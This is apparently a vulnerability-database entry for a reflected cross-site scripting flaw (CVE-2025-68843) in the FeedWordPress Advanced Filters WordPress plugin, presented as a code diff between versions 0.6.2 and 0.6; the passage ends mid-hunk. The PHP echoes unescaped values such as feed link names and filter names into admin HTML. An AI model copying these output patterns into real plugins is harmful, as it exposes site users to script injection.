CVE-2025-68843: FeedWordPress Advanced Filters <= 0.6.2 – Reflected Cross-Site Scripting (faf)

--- a/faf/advanced_filters_overview.php
+++ b/faf/advanced_filters_overview.php
@@ -29,9 +29,9 @@
 public function faf_filters_overview()
 {

-echo "<h2>" . __("Feedwordpress Advanced Filters Overview","faf") . "</h2>";
+echo "<h2>" . __("Feedwordpress Advanced Filters Overview") . "</h2>";

- _e("This page will display the filters from all feeds in the order they will be executed on the posts", "faf");
+ _e("This page will display the filters from all feeds in the order they will be executed on the posts");

 $faf = new FeedwordpressAdvancedFilters();

@@ -45,7 +45,7 @@

  			 echo "<a name='#" . $link->link_name . "' ></a>";
 			 echo "<hr /><h3>" . $link->link_name  . "</h3>";
-
+			//echo "<hr /><p class='faf_overviewContext'>$context <hr /></p>";

 	foreach($filter_array as $context => $filters)
 	{
@@ -64,22 +64,15 @@
 	 		  $av_filters = $faf->get_available_filters();
 	 		  $filter_function = $av_filters[$context][$name]["filter_function"];

-				if (version_compare(PHP_VERSION,"5.3.0","<"))
-					$desc = call_user_func($filter_function.'::get_description'); //php 5.2 compat.
-				else
-					$desc = $filter_function::get_description();
-
+				$desc = $filter_function::get_description();

 	 		  echo "<div class='faf_filterBox'><h4>$desc</h4>";
 	 		   //$filterObj = new $filter_function(array(),$args);
 	 		   //$filterObj->display();
+	 		  // print_R($args);
+
+	 		   $filter_function::getDisplay($args);

-	 		//   $filter_function::getDisplay($args);
-	 		  if (version_compare(PHP_VERSION,"5.3.0","<"))
-	 			   call_user_func_array($filter_function.'::getDisplay',array($args, $filter_function));
-	 		  else
-	 		  	  $filter_function::getDisplay($args);
-
 	 		  	/* foreach($args as $arg_name => $arg_value)
 	 		  	{
 	 		  		if ($arg_value == 1) $arg_value = "yes";
--- a/faf/faf_admin.php
+++ b/faf/faf_admin.php
@@ -1,140 +0,0 @@
-<?php
-	  $page_type = $this->get_page_type($page);
-	  if ($page->for_feed_settings())
-	      $global_array = $this->get_filter_options($page, true, true, true);
-
-     	  $filter_array = $this->get_filter_options($page,true,true);
-
-	  $index = 0; // multiple form fields
-	  if (isset($filter_array["process_setting"]))
-      {
-    	  $process_setting = $filter_array["process_setting"];
-    	  unset($filter_array["process_setting"]); // really? yes really.
-	  }
-	  else
-	     $process_setting = "site-default";
-	?>
-
-<div class="faf_globalFilterBox">
-	<p><?php  _e("Filter processing settings","faf") ?> :</p>
-
-<?php // global settings. Should local filter override after / before / not?
-
-
-		$postSelector = array(
-		'only-global' => __("Only excute filters for all feeds (ignore per feed settings)","faf"),
-		'no-global' => __("Only execute filters per feed (ignore filters for all feeds) ","faf"),
-		'global-first' => __("Execute filters for all feeds first","faf"),
-		'global-last' => __("Execute per feed filters first","faf"),
-		);
-        ?>
-
-        <?php if ($page->for_feed_settings()):
-            if (isset($global_array["process_setting"]))
-	    {        $global_setting = $global_array["process_setting"];
-
-	    }
-	    else
-	    	    $global_setting = 'global-first';
-            $href = "";
-        ?>
-
-
-             <ul class="options global-options">
-             <?php if ($process_setting == 'site-default') $sel = "CHECKED"; else $sel = ""; ?>
-            <li><label><input type="radio" name="faf_process_setting" value="site-default" <?php echo $sel?> />
-               <?php _e("Use the site-wide setting", "faf"); ?></label>
-            <span class="current-setting"><?php _e("Currently:", "faf"); ?><strong> <?php echo $postSelector[$global_setting] ?></strong> (<a href="<?php print $href; ?>"><?php _e("change") ?></a>) </span>
-            </li>
-            </ul>
-
-        <?php endif; // for feed settings ?>
-
-	    <ul class="options local-options">
-	    <?php
-		foreach($postSelector as $value => $text):
-		    if($process_setting == $value)
-		        $sel = "CHECKED";
-		     else
-		        $sel = "";
-		?>
-		<li>
- <input type="radio" name="faf_process_setting" value="<?php echo $value ?>" <?php echo $sel ?> /> <label><?php echo $text ?>
-    </label>
-		</li>
-		<?php
-		endforeach;
-        ?>
-     <?php if ($page->for_feed_settings()):  ?>
-        </ul>
-
-      <?php endif; ?>
-</div>
-
-
-<p class="setting-description"><?php _e("You can pick any number of Filters. The meaning of the values of every filter can differ. Some have extra options as well", "faf"); ?></p>
-
-<div class="faf_notBox"><?php _e("Please remember to click the Save button after making changes!", "faf") ?></div>
-<div class="faf_errorBox"><?php _e("Some fields are required. Please fill them out first!", "faf") ?></div>
-
-	<input type="hidden" name="current_page" value="<?php echo $page_type ?>" />
-
-	<div id="filters">
-	  <?php
-	  foreach ($filter_array as $index => $filter):
-	        $filter_name = $filter["filter_name"];
-	       	$filter_args = $filter["filter_args"];
-	       	$filter_class = $this->available_filters[$page_type][$filter_name]["filter_function"];
-
-	        if ($filter_name != "")
-	        $filter_text = $this->available_filters[$page_type][$filter_name]["filter_text"];
-	        $selected = $filter_name;
-	  ?>
-
-	<div id="faf_filter<?php echo $index ?>" class="faf_filterBox">
-		<?php  if ($filter_name != "")
-		    {
-		        echo "<input type='hidden' name='faf_filter[$index]' value='$filter_name' />";
-		        echo " <h4>" . __($filter_text) . "<span class='delete_filter'>X</span></h4>
-		        <span class='faf_bigFilterNr'>" . ($index+1) . "</span>
-		        <div id='faf_filterSetting$index' class='faf_filterSetting'>";
-		        	$this->showFilterParams($page_type, $filter_name, $index, $filter_args);
-		        echo "</div>";
-
-		        if (method_exists($filter_class,'display_help_text'))
-		        {
-		       	    echo "<div class='faf_filterHelpBox'>";
-		            echo "?";
-		            echo "<span class='faf_filterHelpText'>";
-		    			// php 5.2 workarounds
-					if (version_compare(PHP_VERSION,"5.3.0","<"))
-			            call_user_func($filter_class.'::display_help_text');
-					else
-		            	$filter_class::display_help_text();
-		            echo "</span>";
-		        	echo "</div>";
-		        }
-		    }
-		?>
-
-
-	</div> <!--- /filterdiv -->
-
-	    <?php endforeach; ?>
-	</div> <!--- /filters -->
-	<div >
-			<div class="faf_newerrorBox"><?php _e("Error", "faf") ?></div>
-
-	<?php
-			if ($index > 0 ) $index++;
-		    	 echo "<h2>" . __("New Filter", "faf") . "</h2>";
-		      echo $this->showFilterOptions($page,$index);
-			echo "<input type='button' class='button' name='add_filter' id='add_filter' value='" . __("Add Filter", 'faf') . "'>";
-			echo "<input type='hidden' name='new_filter_index' id='new_filter_index' value='" . $index . "' />";
-
-
-	?>
-	</div>
-	<br />
-	<div class='faf_small'><a href="http://www.weblogmechanic.com/plugins/feedwordpress-advanced-filters/" target="_blank"><?php _e("Feedwordpress Advanced Filters") ?></a> <?php _e("version", 'faf') ?> <?php echo FAF_VERSION ?> <?php _e("by",'faf') ?> Bas Schuiling</div>
-
--- a/faf/feedwordpress_advanced_filters.php
+++ b/faf/feedwordpress_advanced_filters.php
@@ -3,7 +3,7 @@
 Plugin Name: Feedwordpress Advanced Filters
 Plugin URI: http://www.weblogmechanic.com/plugins/feedwordpress-advanced-filters/
 Description: Feedwordpress Advanced Filters allows you to filter and manipulate Feedwordpress posts from feeds.
-Version: 0.6.2
+Version: 0.6
 Author: Bas Schuiling
 Author URI: http://www.weblogmechanic.com/
 License: GPL
@@ -21,9 +21,11 @@

 define('FAF_DEBUG',false);
 define('FAF_FILTERS',"fafFilter");
-define('FAF_VERSION','0.6.2');
+define('FAF_VERSION','0.6');

-class FeedWordPressAdvancedFilters
+
+
+Class FeedWordPressAdvancedFilters
 {
 	private $available_filters = array(); // Set by function so class may be extended
     private $current_filter_options;
@@ -96,7 +98,7 @@

 			}

- 		  add_action('init', array($this,'set_available_filters')); // load filters
+ 		  $this->set_available_filters(); // load filters
 	}

 	/* Plugin initialisation function
@@ -104,12 +106,8 @@
 	* Init is called by Wordpress on plugin startup. Registers styles, javascripting etc to the Wordpress handler
 	*
 	*/
-	public function init($hook)
+	public function init()
     	{
-		// prevents FAF from loading everywhere in wp-admin
-    	if (strpos($hook, 'feedwordpress') === false && strpos($hook, 'faf') === false)
-			return;
-
 		wp_register_style( 'faf_style', plugins_url('faf_style.css', __FILE__) );
 		wp_enqueue_style('faf_style');
 		wp_register_script('faf-js', plugins_url('faf.js',__FILE__));
@@ -120,33 +118,10 @@
            		 array( 'ajax_url' => admin_url( 'admin-ajax.php' ), 'we_value' => $nonce,
            		 		'loader_url' => plugins_url('images/ajax-loader.gif',__FILE__ ) ) );

-
+      	//load_plugin_textdomain( 'faf', false, dirname( plugin_basename( __FILE__ ) ) . '/languages/' );

 	}

-	/* Load plugin textdomain
-	*
-	* @since 0.7
-	*/
-	public function load_plugin_textdomain()
-	{
-		$domain = 'faf';
-		load_plugin_textdomain($domain, FALSE, dirname(plugin_basename(__FILE__)).'/languages/');
-	}
-
-
-
-	/* Init of scripts for FAF.
-	*
-	* This function is seperate because it uses admin_enqueue_scripts to prevent loading from other parts of
-	* WP-admin.
-	*/
-	/*public function init_script()
-	{
-
-
-	} */
-

 	/**
 	* Set all available filters
@@ -167,7 +142,7 @@
 	*
 	* @since 0.1
 	*/
-	public function set_available_filters()
+	protected function set_available_filters()
 	{
 	   $classes = get_declared_classes();

@@ -177,13 +152,11 @@
 	   {
 	   	if (is_subclass_of($c, FAF_FILTERS))
 		{
-	 			$name = $c::$name;
-	 			$context = $c::$context;
- 	  			$desc = $c::get_description();
-	  	 		$av_filters[$context][$name] = array("filter_text" => $desc, "filter_function" => $c);
-				$av_filters[$context][$name]["filter_controls"] = $c::getControls();
-			// done
-
+	 		$name = $c::$name;
+	 		$context = $c::$context;
+ 	  		$desc = $c::get_description();
+  	 		$av_filters[$context][$name] = array("filter_text" => $desc, "filter_function" => $c);
+			$av_filters[$context][$name]["filter_controls"] = $c::getControls();
 	  		if(method_exists($c,"process_complete"))
 	  			$this->process_complete[] = $c;
 		}
@@ -217,7 +190,7 @@
 	    $this->debug = false;
 		add_meta_box(
 			/*id=*/ 'faf',
-			/*title=*/ __('Feedwordpress Advanced Filters', 'faf'),
+			/*title=*/ __('Feedwordpress Advanced Filters'),
 			/*callback=*/ array($this, 'html_metabox'),
 			/*page=*/ $page->meta_box_context(),
 			/*context=*/ $page->meta_box_context()
@@ -233,8 +206,141 @@
 	* @param Object $FeedWordPress Page object
 	*/
 	public function html_metabox($page)
-	{
-	 	require_once("faf_admin.php");
+	{
+	  $page_type = $this->get_page_type($page);
+	  if ($page->for_feed_settings())
+	      $global_array = $this->get_filter_options($page, true, true, true);
+
+     	  $filter_array = $this->get_filter_options($page,true,true);
+
+	  $index = 0; // multiple form fields
+	  if (isset($filter_array["process_setting"]))
+      {
+    	  $process_setting = $filter_array["process_setting"];
+    	  unset($filter_array["process_setting"]); // really? yes really.
+	  }
+	  else
+	     $process_setting = "site-default";
+	?>
+
+<div class="faf_globalFilterBox">
+	<p><?php  _e("Filter processing settings") ?> :</p>
+<?php // global settings. Should local filter override after / before / not?
+
+		//$thesePosts = $page->these_posts_phrase();
+		$postSelector = array(
+		'only-global' => __("Only excute filters for all feeds (ignore per feed settings)"),
+		'no-global' => __("Only execute filters per feed (ignore filters for all feeds) "),
+		'global-first' => __("Execute filters for all feeds first"),
+		'global-last' => __("Execute per feed filters first"),
+		);
+        ?>
+
+        <?php if ($page->for_feed_settings()):
+            if (isset($global_array["process_setting"]))
+	    {        $global_setting = $global_array["process_setting"];
+
+	    }
+	    else
+	    	    $global_setting = 'global-first';
+            $href = "";
+        ?>
+
+
+             <ul class="options global-options">
+             <?php if ($process_setting == 'site-default') $sel = "CHECKED"; else $sel = ""; ?>
+            <li><label><input type="radio" name="faf_process_setting" value="site-default" <?php echo $sel?> />
+               <?php _e("Use the site-wide setting"); ?></label>
+            <span class="current-setting"><?php _e("Currently:"); ?><strong> <?php echo $postSelector[$global_setting] ?></strong> (<a href="<?php print $href; ?>"><?php _e("change") ?></a>) </span>
+            </li>
+            </ul>
+
+        <?php endif; // for feed settings ?>
+
+	    <ul class="options local-options">
+	    <?php
+		foreach($postSelector as $value => $text):
+		    if($process_setting == $value)
+		        $sel = "CHECKED";
+		     else
+		        $sel = "";
+		?>
+		<li>
+ <input type="radio" name="faf_process_setting" value="<?php echo $value ?>" <?php echo $sel ?> /> <label><?php echo $text ?>
+    </label>
+		</li>
+		<?php
+		endforeach;
+        ?>
+     <?php if ($page->for_feed_settings()):  ?>
+        </ul>
+
+      <?php endif; ?>
+</div>
+
+
+<p class="setting-description"><?php _e("You can pick any number of Filters. The meaning of the values of every filter can differ. Some have extra options as well"); ?></p>
+
+<div class="faf_notBox"><?php _e("Please remember to click the Save button after making changes!") ?></div>
+<div class="faf_errorBox"><?php _e("Some fields are required. Please fill them out first!") ?></div>
+
+	<input type="hidden" name="current_page" value="<?php echo $page_type ?>" />
+
+	<div id="filters">
+	  <?php
+	  foreach ($filter_array as $index => $filter):
+	        $filter_name = $filter["filter_name"];
+	       	$filter_args = $filter["filter_args"];
+	       	$filter_class = $this->available_filters[$page_type][$filter_name]["filter_function"];
+
+	        if ($filter_name != "")
+	        $filter_text = $this->available_filters[$page_type][$filter_name]["filter_text"];
+	        $selected = $filter_name;
+	  ?>
+
+	<div id="faf_filter<?php echo $index ?>" class="faf_filterBox">
+		<?php  if ($filter_name != "")
+		    {
+		        echo "<input type='hidden' name='faf_filter[$index]' value='$filter_name' />";
+		        echo " <h4>" . __($filter_text) . "<span class='delete_filter'>X</span></h4>
+		        <span class='faf_bigFilterNr'>" . ($index+1) . "</span>
+		        <div id='faf_filterSetting$index' class='faf_filterSetting'>";
+		        	echo $this->showFilterParams($page_type, $filter_name, $index, $filter_args);
+		        echo "</div>";
+		        if (method_exists($filter_class,'display_help_text'))
+		        {
+		       	    echo "<div class='faf_filterHelpBox'>";
+		            echo "?";
+		            echo "<span class='faf_filterHelpText'>";
+		            $filter_class::display_help_text();
+		            echo "</span>";
+		        	echo "</div>";
+		        }
+		    }
+		?>
+
+
+	</div> <!--- /filterdiv -->
+
+	    <?php endforeach; ?>
+	</div> <!--- /filters -->
+	<div >
+			<div class="faf_newerrorBox"><?php _e("Error") ?></div>
+
+	<?php
+			if ($index > 0 ) $index++;
+		    	 echo "<h2>" . __("New Filter") . "</h2>";
+		      echo $this->showFilterOptions($page,$index);
+			echo "<input type='button' name='add_filter' id='add_filter' value='" . __("Add Filter") . "'>";
+			echo "<input type='hidden' name='new_filter_index' id='new_filter_index' value='" . $index . "' />";
+
+
+	?>
+	</div>
+	<br />
+	<div class='faf_small'><a href="http://www.weblogmechanic.com/plugins/feedwordpress-advanced-filters/" target="_blank"><?php _e("Feedwordpress Advanced Filters") ?></a> <?php _e("version") ?> <?php echo FAF_VERSION ?> <?php _e("by") ?> Bas Schuiling</div>
+
+	<?php

 	} // html_metabox

@@ -287,7 +393,6 @@
 		$filter_class = $this->available_filters[$page_type][$filter_name]["filter_function"];
 		$filter_validate = array(); // collect validation info

-
 		foreach($filter_options as $filter_option) // loop all style elements
 		{

@@ -335,14 +440,8 @@
 		 		}
 		 	break;
 		 	default: // assume special function
-		 		if (method_exists($filter_class,$type))
-		 		{
-		 			// php 5.2 workarounds
-					if (version_compare(PHP_VERSION,"5.3.0","<"))
-		 	  		  	call_user_func_array($filter_class.'::'.$type, array($page_type, $index, $current_value, $desc));
-		 	  		else
-		 	  			$filter_class::$type($page_type, $index, $current_value, $desc);
-		 	  	}
+		 		if (method_exists($filter_class,$type))
+		 	  	$filter_class::$type($page_type, $index, $current_value, $desc);
 		 	break;
 		 }
 		 echo "</div>";
@@ -447,6 +546,10 @@
     $this->save_filter_options($page, $filter_array);
 }

+
+
+
+
     /**
     * Determines the current page type and context
     *
@@ -653,11 +756,6 @@
 	public function faf_decide_filter($args, $args2)
 	{
 		// Syndicate_item hook. $args = assoc array of post to be inserted
-		faf_debug("FAF deciding on filters on post to be syndicated:");
-		faf_debug($args["post_title"]);
-		faf_debug($args);
-		 		// return $args;
-
 		$post = $args;

 		$av_filters = $this->available_filters;
@@ -666,13 +764,12 @@

 		// will loop trough all filters selected with this feed.
 		$syndiPost = $args2; // args 2 is of Syndipost class
-
-
-
-     	$filter_array = $this->get_filter_tree($syndiPost->link);
+
+     	   $filter_array = $this->get_filter_tree($syndiPost->link);

 		if (empty($filter_array) || ! is_array($filter_array))
 		{
+
 			return $post;
 		}

@@ -691,8 +788,7 @@
 			    {
 				    $filter_function = $av_filters[$context][$filter_name]["filter_function"];
 				    $filter_args = $filter["filter_args"];
-					faf_debug("Doing filter:" . $filter_function);
-
+
 				    $filterObj = new $filter_function($post,$filter_args);
 				    $post = $filterObj->execute(); // do it!
 			    }
@@ -706,9 +802,7 @@
 			faf_debug("Serious problem: Filters returned no post");
 			$post = $args;
 		}
-		 faf_debug("Decide filter: Returning post, everything seems orderly :" . $post["post_title"]);
-		 faf_debug($post);
-
+     //	faf_debug( $post );
 		 return $post;
 	}

@@ -716,12 +810,7 @@
 	{
 		foreach($this->process_complete as $c)
 		{
-
-			// php 5.2 workarounds
-			if (version_compare(PHP_VERSION,"5.3.0","<"))
-				call_user_func($c.'::process_complete');
-			else
-				$c::process_complete();
+			$c::process_complete();
 		}
 	}

@@ -752,13 +841,7 @@
 	  	    echo "<div class='faf_filterHelpBox'>";
 	        echo "?";
 	        echo "<span class='faf_filterHelpText'>";
-
-	        // php 5.2 workarounds
-			if (version_compare(PHP_VERSION,"5.3.0","<"))
-		        call_user_func($filter_class.'::display_help_text');
-			else
 		        $filter_class::display_help_text();
-
 	        echo "</span>";
 	      	echo "</div>";
 	   }
@@ -773,9 +856,7 @@
 if (is_admin())
 {
 	add_action("admin_menu","overviewSubMenu",100);
-	add_action('admin_enqueue_scripts', array($faf, 'init'));
-	add_action('init', array($faf, 'load_plugin_textdomain'));
-//	add_action('admin_enqueue_scripts', array($faf,'init_script') );
+	add_action('admin_init', array($faf, 'init'));
 	register_activation_hook (__FILE__, 'faf_install');
 	register_uninstall_hook (__FILE__, 'faf_uninstall');
 }
@@ -868,6 +949,10 @@
  	die( __("Feedwordpress plugin is required for Feedwordpress Advanced Filters to work!") );
  }

+ if (version_compare(PHP_VERSION,'5.3.0','<')) {
+ 	deactivate_plugins( __FILE__  );
+ 	die( __("Feedwordpress Advanced Filters requires at least PHP version 5.3 to work!"));
+ 	}
 }


@@ -879,11 +964,9 @@
 	*/
 	 function faf_debug($msg)
 	{
-		echo "<p>" ;
-		print_r($msg);
-		echo  "</p>";
+
 		if (function_exists("console"))
-		{
+		{
 			console($msg);
 		}
 	//	FeedWordpress::diagnostic('updated_feeds:errors',$msg);
--- a/faf/filters.php
+++ b/faf/filters.php
@@ -41,29 +41,29 @@

 	$controls["filter_value"] = array(
 			"name" => "filter_value",
-			"desc" => __("Value", "faf"),
+			"desc" => __("Value"),
 			"type" => "text",
 			"required" => true);
 	$controls["search_title"] = array(
 			"name" => "filter_search_title",
-			"desc" => __("Search in Title", "faf"),
+			"desc" => __("Search in Title"),
 			"type" => "checkbox");
 	$controls["search_excerpt"] = array(
 			"name" => "filter_search_excerpt",
-			"desc" => __("Search in Excerpt", "faf"),
+			"desc" => __("Search in Excerpt"),
 			"type" => "checkbox");
 	$controls["search_content"] = array(
 			"name" => "filter_search_content",
-			"desc" => __("Search in Content", "faf"),
+			"desc" => __("Search in Content"),
 			"type" => "checkbox",
 			"default" => "1");
 	$controls["match_entire_word"] = array(
 			"name" => "filter_match_word",
-			"desc" => __("Only match entire word", "faf"),
+			"desc" => __("Only match entire word"),
 			"type" => "checkbox");
 	$controls["match_case"] = array(
 			"name" => "filter_match_case",
-			"desc" => __("Only match case", "faf"),
+			"desc" => __("Only match case"),
 			"type" => "checkbox");

      	return $controls;
@@ -92,23 +92,11 @@
     * This function tries to get find a display function per type of control
     *
     */
-    public static function getDisplay($args = array(), $class = "")
+    public static function getDisplay($args = array())
 	{
-		//$controls = call_user_func_array($c.'::getControls',$c);
-
-	faf_debug(version_compare(PHP_VERSION,"5.3.0","<"));
-
-		// php 5.2 workarounds
-		if (version_compare(PHP_VERSION,"5.3.0","<"))
-		{
-			$controls = call_user_func_array($class.'::getControls',$class);
-		}
-		else
-		{
-			$c = get_called_class();
-			$controls = $c::getControls();
-		}
+		$c = get_called_class();

+		$controls = $c::getControls();
 		echo "<div class='faf_filterSetting'>";
 		foreach($controls as $control)
 		{
@@ -123,13 +111,7 @@
 			if (method_exists($c, "display_" . $type))
 			{
 				$method = "display_" . $type;
-
-				// php 5.2 workarounds
-				if (version_compare(PHP_VERSION,"5.3.0","<"))
-					call_user_func_array($c.'::'.$method, array($control, $value));
-				else
-					$c::$method($control, $value);
-
+				$c::$method($control, $value);
 			}

 		}
@@ -180,32 +162,17 @@
     *
     * @return Array Control_array Array of controls ( see documentation for format )
     */
-    public static function getControls($class = "" )
+    public static function getControls()
     {
-    	$control_array = array();
-		// php 5.2 workarounds
-		if (version_compare(PHP_VERSION,"5.3.0","<"))
-		{
-			$vars = get_class_vars($class);
-			$defined_controls = call_user_func($class.'::setControls');
-	 	   $use_control = explode(",",$vars['controls']);
-		}
-		else
-		{
-			$c = get_called_class();
-			$defined_controls = $c::setControls();
-			$use_control = explode(",",$c::$controls);
-		}
-
-
-
-   	foreach($use_control as $control)
+    	$c = get_called_class();
+    	$defined_controls = $c::setControls();
+    $control_array = array();
+    $use_control = explode(",",$c::$controls);
+    	foreach($use_control as $control)
 	    	{
 	    			if (isset($defined_controls[trim($control)]))
 		    			 $control_array[] = $defined_controls[trim($control)];
 	    	}
-
-
     	return $control_array;
     }
  }
--- a/faf/filters/categories_keyword.php
+++ b/faf/filters/categories_keyword.php
@@ -14,14 +14,14 @@
 	{
 		 _e("Specify keyword(s) and categories. If the keyword matches this post will additionally added to your selected categories
 		 You can use multiple keywords by entering them comma-seperated
-		", "faf");
+		");

 	}

 	/* Function not an attribute due for gettext */
 	public static function get_description()
 	{
-		return __("Add post to category when keywords match", "faf");
+		return __("Add post to category when keywords match");

 	}

@@ -99,16 +99,22 @@
       return $post;
 	}

-
+  /*   public function display()
+     {
+     	$args = $this->args;
+     	print_R($args);
+
+     } */
+


      public static function setControls()
      {
      	$controls = parent::setControls();
-     	$controls["filter_value"]["desc"] = __("Keyword", "faf");
+     	$controls["filter_value"]["desc"] = __("Keyword");
      	$controls["categories"] = array(
 		"name" => "faf_filter_categories",
-		"desc" => __("Categories", "faf"),
+		"desc" => __("Categories"),
 		"type" => "categories_box"
 		);
      	return $controls;
--- a/faf/filters/expire_post.php
+++ b/faf/filters/expire_post.php
@@ -14,10 +14,10 @@
 	{
 		echo "<p>";
 		_e("This filter allows you to expire posts after a certain time. You can either set to use the date of aggregation or the
-			  date the post has in the feed.", "faf");
+			  date the post has in the feed.");
 		echo "</p>";
 		echo "<p>";
-		 _e("Warning: if you delete posts on expiration date and they are still exist in the feed they will be resyndicated", "faf");
+		 _e("Warning: if you delete posts on expiration date and they are still exist in the feed they will be resyndicated");
 		echo "</p>";

 	}
@@ -25,7 +25,7 @@
 	/* Function not an attribute due for gettext */
 	public static function get_description()
 	{
-		return __("Expire posts", "faf");
+		return __("Expire posts");

 	}

@@ -115,26 +115,27 @@
 		if (! is_plugin_active("post-expirator/post-expirator.php"))
 		{
 			$controls["expirator_error"] = array("name" => "expire_need",
-					 "desc" => __("This filter needs <a href='http://wordpress.org/extend/plugins/post-expirator/' target='_blank'>Post expirator</a> plugin to function", "faf"),
+					 "desc" => __("This filter needs <a href='http://wordpress.org/extend/plugins/post-expirator/' target='_blank'>
+												 			Post expirator</a> plugin to function"),
 												"type" => "expire_need_expirator");
 			return $controls;
 		}
 		$controls = parent::setControls();
 		$controls["expire_method"] = array(
 		"name" => "filter_expire_method",
-		"desc" => __("Set expire-time:", "faf"),
+		"desc" => __("Set expire-time:"),
 		"type" => "radio",
 		"default" => "setdate",
-		"options" => array("postdate" => __("From post date", "faf"),"setdate" => __("From feed update", "faf"))
+		"options" => array("postdate" => __("From post date"),"setdate" => __("From feed update"))
 		);
 		$controls["expire_time"] = array(
 		"name" => "filter_expire_time",
-		"desc" => __("Time", "faf"),
+		"desc" => __("Time "),
 		"type" => "expire_time_box",
 		"default" => array(1,'m') );
 		$controls["expire_how"] = array(
 		"name" => "filter_expire_how",
-		"desc" => __("How to expire", "faf"),
+		"desc" => __("How to expire"),
 		"type" => "expire_how_box",
 		"default" => "draft");
 		return $controls;
@@ -180,12 +181,11 @@

 	private function get_time_options()
 	{
-		$time_options = array('h' => __("hour(s)", "faf"),
-							  'd' => __("day(s)", "faf"),
-							  'w' => __("week(s)", "faf"),
-							  'm' => __("month(s)", "faf"),
-							  'y' => __("year(s)", "faf")
-							 );
+		$time_options = array('h' => __("hour(s)"),
+							  'd' => __("day(s)"),
+							  'w' => __("week(s)"),
+							  'm' => __("month(s)"),
+							  'y' => __("year(s)"));
 		return $time_options;
 	}

--- a/faf/filters/image_filters.php
+++ b/faf/filters/image_filters.php
@@ -15,21 +15,21 @@
 	{
 		echo "<p>";
 		 _e("Filter for manipulation of images in your feed. You can remove images from the excerpt or resize
-		 			them using the standard WordPress sizes. ", "faf");
+		 			them using the standard WordPress sizes. ");
 		 echo "</p>";
 		 echo "<p>";
 		 _e("Save images locally: will save the feed image to your local wordpress installation instead
-		 		   of leaving it on the remote host", "faf");
+		 		   of leaving it on the remote host");
 		 echo "</p>";
 		 echo "<p>";

 		 _e("Images to process: in case you have multiple images you can select which ones to process,
 		 		   i.e '1,2,3,4'. This works together with 'remove unselected images'. Every image not processing
-		 		   will be dropped. Leave empty if all images should be processed or you have a feed with only one image", "faf");
+		 		   will be dropped. Leave empty if all images should be processed or you have a feed with only one image");
 		 echo "</p>";
 		 echo "<p>";

-		_e(" Set featured: Will set an image as 'featured image' in the Wordpress post and remove it from your content", "faf");
+		_e(" Set featured: Will set an image as 'featured image' in the Wordpress post and remove it from your content");

 		 echo "</p>";

@@ -38,13 +38,13 @@
 	/* Function not an attribute due for gettext */
 	public static function get_description()
 	{
-		return __("Image filters", "faf");
+		return __("Image filters");

 	}

    function execute()
+
    {
-   	faf_debug("Execute image filter");
     $post = $this->post;
     $args = $this->args;

@@ -58,11 +58,10 @@

     // all other filters except remove excerpt done there
     $post = $this->image_process($post,$args,"content");
-	faf_debug($post["meta"]);
+
 	// Do Enclosures
 	if (isset($post["meta"]["enclosure"]))
 	{
-		faf_debug("Execute : Enclosure images");
 	 	$filter_image_local = ( (isset($args["filter_image_local"]) && $args["filter_image_local"] == 1) ? 1 : 0);
 	 	if ($filter_image_local == 1)
 	 	{
@@ -80,30 +79,30 @@
 	$controls = parent::setControls();
 	$controls["image_local"] = array(
 		"name" => "filter_image_local",
-		"desc" => __("Save images locally", "faf"),
+		"desc" => __("Save images locally"),
 		"type" => "checkbox",
 		"default" => "1");
 	$controls["image_remove_excerpt"] = array(
 		"name" => "filter_image_remove_excerpt",
-		"desc" => __("Remove images from excerpt", "faf"),
+		"desc" => __("Remove images from excerpt"),
 		"type" => "checkbox",
 		"default" => "1");
 	$controls["image_size_box"] = array(
 		"name" => "faf_image_resize",
-		"desc" => __("Resize image to", "faf"),
+		"desc" => __("Resize image to"),
 		"type" => "image_size_box",
 		"default" => "medium");
 	$controls["image_process_select"] = array(
 		"name" => "faf_image_process_select",
-		"desc" => __("Images to process", "faf"),
+		"desc" => __("Images to process"),
 		"type" => "text");
 	$controls["image_remove_unselected"] = array(
 		"name" => "faf_image_remove",
-		"desc" => __("Remove unselected images", "faf"),
+		"desc" => __("Remove unselected images"),
 		"type" => "checkbox");
 	$controls["image_set_featured"] = array(
 		"name" => "faf_image_featured",
-		"desc" => __("Set featured image", "faf"),
+		"desc" => __("Set featured image"),
 		"type" => "checkbox");
 	return $controls;
      }
@@ -148,10 +147,7 @@
  	   				set_post_thumbnail($post_id, $attach_id);
  	   				delete_post_meta($post_id,'faf_featured_image');
  	   			}
- 	   			else {
- 	   			 faf_debug( is_numeric($attach_id) );
- 	   			 faf_debug("Attach Id ( $attach_id ) not integer for post_thumbnail $post_id");
- 	   			 }
+ 	   			else faf_debug("Attach Id ($attach_id) not integer for post_thumbnail $post_id");
     		break;
     		default: faf_debug("Process_complete: Meta Keys detected not of usuable type");
  	   		break;
@@ -174,7 +170,7 @@
   	public static function image_size_box($page_type, $index = 0, $value = "", $filter_text)
   	{
   		$image_sizes = get_intermediate_image_sizes();
-  		array_unshift($image_sizes,__("Do not Resize", "faf"));
+  		array_unshift($image_sizes,__("Do not Resize"));
   		echo "<label>$filter_text</label>";
   		echo "<select name='faf_image_resize[$index]'>";
   		foreach($image_sizes as $image_size)
@@ -207,7 +203,7 @@
   */
  private function image_process($post, $args, $process_type = "content")
  	{
-	faf_debug("Image process");
+
 	$content = $post["post_$process_type"]; // excerpt or content

  	$filter_image_local = ( (isset($args["filter_image_local"]) && $args["filter_image_local"] == 1) ? 1 : 0);
@@ -215,7 +211,6 @@
  	$remove_unselected = ((isset($args["faf_image_remove"])) ? $args["faf_image_remove"] : 0);

  	preg_match_all( '/<img[^>]+srcs*=s*["']?([^"' ]+)[^>]*>/i', $content, $matches, PREG_SET_ORDER );
-

  	// kill images that should not be processed

@@ -237,9 +232,7 @@
 					$args["imgext"] = $m[1];

 					if ($filter_image_local)
-					{
-						faf_debug("Image process :: Saving local image");
-						$post = $this->save_image_local($post,$args, $process_type);
+					{	$post = $this->save_image_local($post,$args, $process_type);

 					}
 					else
@@ -251,7 +244,6 @@
 				}
 			}
 		}
-	else { faf_debug("No image matches"); faf_debug($matches); }

 	return $post;
  }
@@ -267,8 +259,6 @@
    	return $post;
    }

-
-
     /** Function to check and save enclosures if needed
     *
     * Enclosure is a seperate optional feed in RSS-feeds. This function will check for (multiple) enclosures
@@ -279,9 +269,7 @@
  	private function save_enclosure($post)
  	{
  		$enclosure = $post["meta"]["enclosure"];
-		faf_debug("Enclosure save:");
-		faf_debug($enclosure);
-
+//faf_debug($enclosure);
  		if (! is_array($enclosure) || $enclosure == "")
  		{
  			return $post; // nothing to be done.
@@ -309,7 +297,6 @@

 				$new_file = wp_get_attachment_url($attach_id);
 				$new_enc = str_replace($match[0],$new_file,$enclosed);
